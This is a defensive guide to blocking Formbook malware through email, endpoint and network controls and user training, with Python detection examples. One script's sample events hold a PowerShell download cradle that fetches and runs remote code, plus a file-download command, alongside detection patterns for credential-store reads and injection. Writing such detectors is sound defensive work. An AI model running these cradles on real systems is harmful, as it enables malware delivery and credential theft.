Formbook Malware Protection Guide
Attack Vectors to Block
Formbook primarily spreads through phishing emails containing malicious attachments or links. Blocking these vectors requires a layered defense strategy.
Email Vector: Formbook is commonly distributed via phishing campaigns using compressed attachments (ZIP, RAR) containing malicious executables disguised as invoices, order confirmations, or shipping documents. At the email gateway, implement policies to block or quarantine emails with executable attachments inside archives. Use content disarm and reconstruction (CDR) for Microsoft Office documents, as these are also used as downloaders.
Web Vector: Malicious links in emails lead to compromised websites or file-sharing services hosting Formbook payloads. Deploy a secure web gateway or proxy to block access to known malicious URLs and newly registered domains. Implement browser isolation for high-risk users to prevent drive-by downloads.
Endpoint Vector: Formbook relies on user execution. On endpoints, configure application control or application allowlisting to prevent unauthorized executables from running, especially from user-writable directories like %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads. Restrict script interpreters (PowerShell, WScript, CScript): run PowerShell in Constrained Language Mode with logging enabled, and disable Windows Script Host where it is not needed.
Email Security Configuration
Configure your email security gateway with the following specific rules to block Formbook delivery:
Attachment Filtering:
- Block emails with executable attachments (.exe, .scr, .js, .vbs, .ps1), matching on file content as well as file name, so that double extensions such as Invoice.pdf.exe and renamed files are still caught.
- Quarantine emails containing archive files (.zip, .rar, .7z) and implement automated sandbox analysis for these attachments before release.
- Strip or quarantine macro-enabled Office documents (.docm, .xlsm) from untrusted senders by default.
URL Filtering and Rewriting:
- Enable time-of-click URL scanning for all links within emails. Block access to URLs categorized as malicious, suspicious, or newly registered.
- Configure your gateway to rewrite all HTTP/HTTPS links, forcing them through your secure web proxy for inspection and logging.
Sender and Content Policies:
- Publish SPF, DKIM, and an enforcing DMARC policy for your own domains, and honor senders' DMARC policies on inbound mail, to reduce spoofed emails.
- Use advanced anti-phishing heuristics to detect impersonation attempts (e.g., display name spoofing of common services like DHL, FedEx, or Microsoft).
- Set up rules to flag emails with urgent financial language (“invoice overdue,” “payment required”) for additional review.
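As an added worked example (not part of the original guide and not any gateway vendor's code), the following Python sketch applies the attachment, impersonation, and urgency rules above to a single message. The extension lists, the brand-to-domain table, the urgency phrases, and the DHL-themed sample message with its ZIP are constructed for illustration; a production gateway would also match on file content (magic bytes), not only on names.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Policy tables (assumptions for this example; extend to match your gateway's lists).
BLOCKED_EXT = {".exe", ".scr", ".js", ".vbs", ".ps1", ".com", ".pif", ".bat", ".cmd"}
ARCHIVE_EXT = {".zip", ".rar", ".7z"}
MACRO_EXT = {".docm", ".xlsm", ".pptm"}
# Brands that get impersonated in display names, and the domain allowed to claim each.
IMPERSONATED_BRANDS = {"dhl": "dhl.com", "fedex": "fedex.com", "microsoft": "microsoft.com"}
URGENT_PHRASES = ("invoice overdue", "payment required", "account will be suspended", "action required")


def ext_of(name):
    """Final extension, lowercased, so 'Invoice.pdf.exe' -> '.exe'; trailing spaces are ignored."""
    name = name.lower().rstrip()
    return name[name.rfind("."):] if "." in name else ""


def inspect_zip(archive_name, data):
    """List ZIP members without extracting (works for password-protected archives too) and flag executables."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                if ext_of(member) in BLOCKED_EXT:
                    hits.append(f"block: executable {member} inside {archive_name}")
    except zipfile.BadZipFile:
        hits.append(f"quarantine: {archive_name} is not a readable ZIP")
    return hits


def classify_attachment(filename, data):
    """Policy hits for one attachment; an empty list means it passes these rules."""
    hits = []
    ext = ext_of(filename)
    if ext in BLOCKED_EXT:
        hits.append(f"block: executable attachment {filename}")
        if filename.count(".") > 1:
            hits.append(f"block: double extension {filename}")
    if ext in MACRO_EXT:
        hits.append(f"quarantine: macro-enabled document {filename}")
    if ext in ARCHIVE_EXT:
        hits.append(f"quarantine: archive {filename} pending sandbox analysis")
        if ext == ".zip":  # RAR/7z need external tooling; only ZIP is walked here
            hits.extend(inspect_zip(filename, data))
    return hits


def display_name_impersonation(from_header):
    """'DHL Express <x@evil.example>' claims a brand that the sending domain does not own."""
    name, _, addr = from_header.rpartition("<")
    domain = addr.strip("> ").rpartition("@")[2].lower()
    for brand, legit in IMPERSONATED_BRANDS.items():
        if brand in name.lower() and domain != legit and not domain.endswith("." + legit):
            return f"review: display name claims {brand} but sender domain is {domain}"
    return None


def triage_email(raw):
    """Apply all rules to one RFC 5322 message (bytes) and return the list of findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    hit = display_name_impersonation(msg.get("From", ""))
    if hit:
        findings.append(hit)
    body = msg.get_body(preferencelist=("plain",))
    text = (msg.get("Subject", "") + " " + (body.get_content() if body else "")).lower()
    if any(p in text for p in URGENT_PHRASES):
        findings.append("review: urgent financial language")
    for part in msg.iter_attachments():
        findings.extend(classify_attachment(part.get_filename() or "", part.get_payload(decode=True) or b""))
    return findings


def build_sample():
    """Constructed sample (not a real campaign artifact): fake DHL invoice with a ZIP wrapping a .pdf.exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_4471.pdf.exe", b"MZ placeholder, not a real binary")
    msg = EmailMessage()
    msg["From"] = "DHL Express <billing@dhl-delivery-notice.example>"
    msg["To"] = "ap@corp.example"
    msg["Subject"] = "Invoice overdue - action required"
    msg.set_content("Your shipment is on hold. Payment required within 24 hours.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Invoice_4471.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in triage_email(build_sample()):
        print(finding)
```

Running it on the sample produces four findings: the spoofed DHL display name, the urgency wording, the quarantined archive, and the executable found inside it. The ZIP walk only lists member names, which is deliberate: it never extracts, so archive bombs and encrypted archives cannot stall the gateway, and an archive that will not even open falls through to quarantine.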
Endpoint Protection Tuning
Tune your endpoint detection and response (EDR) or antivirus solution to detect Formbook’s specific behaviors.
Behavioral Detection Rules:
- Create alerts for processes that install keyboard hooks, poll keyboard state, monitor the clipboard, or capture screenshots, especially when the process is newly spawned and is not a browser.
- Detect processes that attempt to read browser credential stores (for example %LocalAppData%\Google\Chrome\User Data\Default\Login Data, or the equivalent paths for other browsers) when the reader is not the browser itself.
- Flag processes that inject code into legitimate processes such as explorer.exe, svchost.exe, or browser processes, a common Formbook tactic for persistence and evasion.
Application Control:
- Deploy a robust application allowlisting policy. Allow execution only from %ProgramFiles%, %ProgramFiles(x86)%, %WINDIR%, and other trusted, administrator-controlled directories. Exclude user-writable subfolders under those roots (for example %WINDIR%\Temp and %WINDIR%\Tasks) from the allow rule, or the policy can be bypassed by dropping a file there.
- Explicitly block execution from high-risk user directories: %TEMP%, %APPDATA%, %USERPROFILE%\Downloads, and the Recycle Bin.
Script Execution Restrictions:
- Disable Windows Script Host (wscript.exe, cscript.exe) for everyday user profiles where it is not required for business.
- Configure PowerShell to run in Constrained Language Mode and enable Module, ScriptBlock, and Transcription logging to capture the PowerShell commands often used in download chains. Constrained Language Mode is enforced reliably only when it is applied through an application control policy (WDAC or AppLocker); setting the __PSLockdownPolicy environment variable on its own is easily bypassed.
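To show how the three rule groups above (behavioral detection, path-based application control, and script restrictions) fit together, here is an added Python example; it is not code from the original page or from any EDR vendor. It evaluates normalised endpoint events: a process start checked against the trusted-path allowlist, a remote thread created in explorer.exe, a read of Chrome's Login Data by a non-browser, a PowerShell command line whose -EncodedCommand payload is decoded before pattern matching, and a 4104 script block. The event shape, the path lists, the process names, and the sample events are assumptions constructed for this illustration.

```python
import base64
import ntpath
import re

# Expanded trusted roots (%ProgramFiles%, %ProgramFiles(x86)%, %WINDIR%) and the user-writable
# fragments the allowlist denies (%TEMP%, %APPDATA%, Downloads, Recycle Bin, plus the writable
# folders that live under %WINDIR%). Assumed paths for this example.
ALLOWED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
DENIED_FRAGMENTS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\downloads\\",
                    "\\$recycle.bin\\", "\\windows\\temp\\", "\\windows\\tasks\\")
INJECTION_TARGETS = {"explorer.exe", "svchost.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
CREDENTIAL_STORES = ("\\google\\chrome\\user data\\default\\login data", "\\mozilla\\firefox\\profiles\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Download-cradle tokens seen in PowerShell command lines and in Event ID 4104 script blocks.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biex\b|"
                       r"invoke-expression|frombase64string", re.I)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def base(path):
    """Windows basename, lowercased (ntpath so this also works when analysed on Linux)."""
    return ntpath.basename(path).lower()


def path_policy(image):
    """Allowlist verdict: default-deny, with user-writable locations denied even under a trusted root."""
    low = image.lower()
    if any(frag in low for frag in DENIED_FRAGMENTS):
        return "deny-userwritable"
    if any(low.startswith(root) for root in ALLOWED_ROOTS):
        return "allow"
    return "deny-default"


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE); None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Alert strings for one normalised EDR event; [] means nothing to raise."""
    alerts = []
    kind = event["type"]
    if kind == "process_create":
        image, parent = event["image"], event["parent"]
        verdict = path_policy(image)
        if verdict != "allow":
            alerts.append(f"{verdict}: {image} spawned by {parent}")
        if base(parent) in OFFICE_APPS:
            alerts.append(f"office-child: {parent} -> {image}")
        cmdline = event.get("cmdline", "")
        decoded = decode_encoded_command(cmdline)
        if decoded:
            cmdline += " " + decoded  # match on the decoded script, not only the wrapper
        if CRADLE_RE.search(cmdline):
            alerts.append(f"download-cradle: {cmdline[:60]}")
    elif kind == "remote_thread":
        # Every cross-process thread into these targets is raised; tune exclusions per environment.
        if base(event["target"]) in INJECTION_TARGETS:
            alerts.append(f"injection: {event['source']} -> {event['target']}")
    elif kind == "file_read":
        low = event["path"].lower()
        if any(s in low for s in CREDENTIAL_STORES) and base(event["image"]) not in BROWSERS:
            alerts.append(f"credential-store-read: {event['image']} read {event['path']}")
    elif kind == "scriptblock":
        if CRADLE_RE.search(event["script"]):
            alerts.append(f"download-cradle(4104): {event['script'][:60]}")
    return alerts


# Constructed sample events; the cradle text and IP are documentation values, not real indicators.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_EVENTS = [
    {"type": "process_create", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\Invoice.pdf.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "Invoice.pdf.exe"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"type": "remote_thread", "source": "C:\\Users\\bob\\AppData\\Local\\Temp\\Invoice.pdf.exe",
     "target": "C:\\Windows\\explorer.exe"},
    {"type": "file_read", "image": "C:\\Windows\\System32\\svchost.exe",
     "path": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"type": "process_create", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "firefox.exe"},
    {"type": "scriptblock",
     "script": "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/b.exe', 'C:\\Users\\bob\\AppData\\Local\\Temp\\b.exe')"},
]


def triage(events):
    return [alert for event in events for alert in evaluate(event)]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The Firefox start is the only sample event that produces nothing, which is the point of a default-deny path policy: a signed browser under %ProgramFiles% is unremarkable, while the same executable dropped in %TEMP% is not. Decoding -EncodedCommand before matching matters because the base64 wrapper hides every cradle keyword from a naive command-line rule.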
Network-Level Defenses
Block Formbook’s command-and-control (C2) communication and secondary payload retrieval at the network perimeter.
DNS Filtering:
- Subscribe to and enforce DNS filtering feeds that categorize and block malware, phishing, and newly seen domains.
- Configure internal DNS servers to log and alert on DNS queries for domains with high-risk TLDs or domains that closely mimic legitimate brands (typosquatting).
- Block DNS resolution for domains registered less than 30 days ago (newly registered domains) for standard user groups, as Formbook often uses freshly registered C2 domains. Keep an exception process, since legitimate new vendor or campaign domains will be caught by the same rule.
Proxy/Web Gateway Rules:
- Block user access to free file-hosting and anonymous upload services commonly used for malware staging.
- Decrypt and inspect HTTPS traffic (where legally and policy permitted) to detect malware beaconing or data exfiltration hidden in encrypted channels.
- Set up outbound traffic rules to alert on connections to IP addresses on threat intelligence feeds associated with Formbook C2 servers.
Firewall Policies:
- Implement egress filtering at the network firewall. Restrict outbound connections from user workstations to only necessary ports and protocols, denying direct outbound connections on uncommon high ports.
- Use your intrusion prevention system (IPS) or next-generation firewall to block traffic matching Formbook C2 signatures, such as specific HTTP POST request patterns or TLS certificate fingerprints associated with its infrastructure.
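The DNS rules and the egress rules above can be exercised against telemetry before they are pushed to the resolver or firewall. The Python below is an added example (not the page's own code and not from any DNS or firewall vendor) that runs both rule sets over constructed resolver and flow log lines: high-risk TLDs, domain age against a stand-in for a registration-date feed, brand look-alikes by edit distance or embedding, RFC 1918 scoping, a threat-intel IP match, and direct outbound connections on non-standard ports. The brand list, TLD list, log format, domain ages, and the single C2 IP are all assumptions constructed for this illustration.

```python
import ipaddress
from datetime import date

# Brands to watch for look-alikes and TLDs treated as high-risk (assumptions for this example).
BRANDS = ("dhl", "fedex", "microsoft", "paypal")
HIGH_RISK_TLDS = {"top", "xyz", "zip", "click", "icu"}
NRD_MAX_AGE_DAYS = 30
# Stand-in for a domain-age feed, constructed entries only; a deployment queries the vendor feed or WHOIS.
FIRST_SEEN = {"dhl-delivery-notice.top": date(2024, 4, 28), "paypa1.com": date(2023, 1, 15)}
TODAY = date(2024, 5, 2)          # fixed so the example is deterministic; use date.today() in production
ALLOWED_EGRESS_PORTS = {80, 443}  # what a workstation may reach directly on the Internet
C2_IPS = {"198.51.100.23"}        # constructed threat-intel entry, not a real indicator
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character look-alikes such as paypa1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """Crude apex split (last two labels); real code should use the public suffix list for co.uk-style TLDs."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[-1]


def dns_findings(domain):
    """Reasons to alert on (or block) one queried domain; [] means nothing noteworthy."""
    findings = []
    apex, tld = registrable(domain)
    sld = apex.split(".")[0]
    if tld in HIGH_RISK_TLDS:
        findings.append(f"high-risk TLD .{tld}")
    seen = FIRST_SEEN.get(apex)
    if seen is not None and (TODAY - seen).days < NRD_MAX_AGE_DAYS:
        findings.append(f"newly registered ({(TODAY - seen).days} days old)")
    for brand in BRANDS:
        if sld == brand:
            continue  # the brand's own apex
        embedded = brand in sld  # dhl-delivery-notice
        near_miss = len(brand) >= 5 and edit_distance(sld, brand) <= 2  # paypa1; short brands skip this test
        if embedded or near_miss:
            findings.append(f"impersonates {brand}")
            break
    return findings


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flow_findings(dst_ip, proto, dst_port):
    """Egress policy for one workstation flow; internal destinations are out of scope for this rule."""
    if is_internal(dst_ip):
        return []
    findings = []
    if dst_ip in C2_IPS:
        findings.append("destination on C2 threat-intel list")
    if proto == "tcp" and dst_port not in ALLOWED_EGRESS_PORTS:
        findings.append(f"direct outbound on non-standard port {dst_port}")
    return findings


def triage_line(line):
    """Parse one constructed line: '<ts> dns <host> <src> <domain>' or '<ts> flow <host> <src> <dst> <proto> <port>'."""
    fields = line.split()
    if len(fields) >= 5 and fields[1] == "dns":
        return [f"{fields[2]} dns {fields[4]}: {x}" for x in dns_findings(fields[4])]
    if len(fields) >= 7 and fields[1] == "flow":
        return [f"{fields[2]} flow {fields[4]}:{fields[6]}: {x}"
                for x in flow_findings(fields[4], fields[5], int(fields[6]))]
    return []


# Constructed log lines in the format triage_line expects; addresses are documentation ranges.
SAMPLE_LOG = """\
2024-05-02T10:14:03Z dns ws-017 10.0.4.17 dhl-delivery-notice.top
2024-05-02T10:14:09Z dns ws-017 10.0.4.17 login.paypa1.com
2024-05-02T10:14:12Z dns ws-017 10.0.4.17 www.microsoft.com
2024-05-02T10:14:15Z flow ws-017 10.0.4.17 198.51.100.23 tcp 8080
2024-05-02T10:14:16Z flow ws-017 10.0.4.17 10.0.0.5 udp 53
2024-05-02T10:14:20Z flow ws-017 10.0.4.17 203.0.113.5 tcp 443
"""


def triage(log_text):
    return [hit for line in log_text.splitlines() if line.strip() for hit in triage_line(line)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Two design choices are worth calling out. The brand look-alike test deliberately skips edit distance for brands shorter than five characters, otherwise a three-letter brand such as dhl would match every three-letter label within one or two edits; those brands are only caught when embedded in a longer label. And internal ranges are listed explicitly rather than relying on ipaddress's is_private, which also treats the RFC 5737 documentation ranges used in the sample as private and would hide the C2 hit.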
User Awareness Training Points
Training should focus on the specific social engineering lures used by Formbook campaigns.
- Suspicious Attachments: Train users to treat any unsolicited email attachment with extreme caution, especially ZIP or RAR files. Emphasize that legitimate organizations rarely send executable files via email. Instruct them to verify the sender via a separate channel before opening.
- Urgency and Fear Tactics: Highlight that Formbook emails often create a false sense of urgency (e.g., “Your account will be suspended,” “Action required on your invoice”). Teach users to recognize this pressure tactic and to pause and report such emails.
- File Extension Deception: Show users real-world examples of how Formbook hides its executable nature, using icons of PDF or Word documents and file names like “Document.pdf.exe”. Train them to always enable viewing of file extensions in Windows Explorer.
- Link Hovering: Reinforce the habit of hovering the mouse cursor over links in emails to preview the actual destination URL before clicking. Point out mismatches between the displayed link text and the true destination, a common trick in Formbook phishing.
- Reporting Procedure: Ensure every user knows the exact, simple process for reporting a suspicious email (e.g., using the “Report Phish” button) to your security team. Quick reporting is critical for containing outbreaks.
For detailed information on how Formbook is distributed, refer to the Distribution Methods. For specific technical indicators, consult the Current IOCs. A general overview of the malware is available on the Formbook Overview page.